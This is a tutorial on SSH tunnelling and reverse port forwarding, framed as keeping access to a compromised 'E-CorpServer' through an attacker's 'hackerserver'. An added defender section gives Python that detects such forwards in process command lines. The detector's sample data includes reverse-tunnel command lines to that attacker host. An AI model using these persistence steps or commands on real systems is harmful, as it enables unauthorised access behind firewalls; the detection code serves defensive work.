Introduction
Today's tutorial will teach you how SSH tunnels work. This is not a hacking tutorial (but you can use the knowledge you gain for hacking: making a SOCKS proxy or staying on a target machine with reverse SSH). SSH tunnelling will help you access services behind a NAT or a firewall.
Well, it's time to talk about SSH.
What is SSH?
Here is what SSH is (thanks to our good friend Wikipedia):
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. The best known example application is for remote login to computer systems by users.
SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH client application with an SSH server. Common applications include remote command-line login and remote command execution, but any network service can be secured with SSH. The protocol specification distinguishes between two major versions, referred to as SSH-1 and SSH-2.
SSH helps you secure the connection between two hosts. This is a really good protocol if you want to avoid man-in-the-middle attacks!
How to connect to a machine behind a NAT / firewall
Here is a little network diagram.
The server blocks SSH connections, so you won't be able to access the server from home.
What we will learn is how to do a reverse SSH connection: the server will connect to a public server, and then you will be able to SSH to the server.
Here are the steps to connect to the server that is behind a firewall:
- Forward port 22 of the E-CorpServer to port 1234 of your server
- Connect to your server from home
- Connect to the E-CorpServer from your server
The E-CorpServer will connect to your server through SSH and set up a remote port forwarding:
E-CorpServer → hackerserver:22
then forward port 22 to hackerserver:1234
Your home machine will connect to hackerserver:
home → hackerserver:22
and then
hackerserver → localhost:1234
Accessing the internal Web Server of E-Corp
Here is the story:
You have successfully got a root shell on the E-CorpServer. You use the reverse SSH connection to be able to connect from home, but you want to access the internal web page from your browser.
Here is what you should do:
- Forward port 8080 of the E-CorpServer to port 8080 of your server
- Forward your local port 80 to the remote port 8080 of your server
And you will be able to browse their internal web server :)
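Seen from the defender's side, each tunnel described above appears as a `-R`, `-L` or `-D` option on an ssh client's command line, which process listings and exec audit logs record. The following is an added example, not part of the original tutorial: it extracts those forwards and flags a remote forward that publishes the host's own sshd. The function names, user names and sample command lines are assumptions constructed for illustration.

```python
import re
import shlex

# Options taking an argument, per OpenSSH ssh(1) (assumption: check your version).
OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")
KINDS = {"L": "local", "R": "remote", "D": "dynamic"}
SPEC = re.compile(r"^(?:(?P<bind>.*):)?(?P<lport>\d+):"
                  r"(?P<host>\[[^\]]+\]|[^:\[\]]+):(?P<hport>\d+)$")

def parse_forwards(cmdline):
    """Return [(kind, spec)] per -L/-R/-D flag (-o/ssh_config forwards not covered)."""
    args, found, positionals, i = shlex.split(cmdline), [], 0, 1
    while i < len(args):
        arg = args[i]
        if not arg.startswith("-") or arg == "-":
            positionals += 1
            if positionals == 2:      # second positional starts the remote command
                break
            i += 1                    # first positional is the destination;
            continue                  # OpenSSH still accepts options after it
        for j in range(1, len(arg)):  # walk clustered flags such as -fNR
            flag = arg[j]
            if flag in OPTS_WITH_ARG:
                value = arg[j + 1:]   # attached form: -R1234:localhost:22
                if not value and i + 1 < len(args):
                    i += 1
                    value = args[i]   # detached form: -R 1234:localhost:22
                if flag in KINDS:
                    found.append((KINDS[flag], value))
                break
        i += 1
    return found

def exposes_sshd(cmdline):
    """True if a remote forward publishes this host's own sshd (port 22) elsewhere."""
    for kind, spec in parse_forwards(cmdline):
        m = SPEC.match(spec)
        if (kind == "remote" and m and m["hport"] == "22"
                and m["host"] in ("localhost", "127.0.0.1", "[::1]")):
            return True
    return False

# Constructed process command lines (sample data; users and hosts are placeholders).
SAMPLES = [
    "ssh -fN -R 1234:localhost:22 user@hackerserver",
    "ssh -NR8080:localhost:8080 user@hackerserver",
    "ssh user@hackerserver -L 80:localhost:8080",
    "ssh -p 2222 admin@backup.example.net uptime",
]
```

Run `parse_forwards` over command lines from your own process or exec audit telemetry; an outbound ssh from a server that remote-forwards its local port 22 deserves a closer look.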
I hope you now understand how SSH tunneling works!
About the Nebula series
Here is a poll for you to decide whether I stop the Nebula series or do something else:
- Stop the Nebula series
- The series is good! I want more tutorials
- We want tutorials on Android malware!
See you in my next tutorial! :)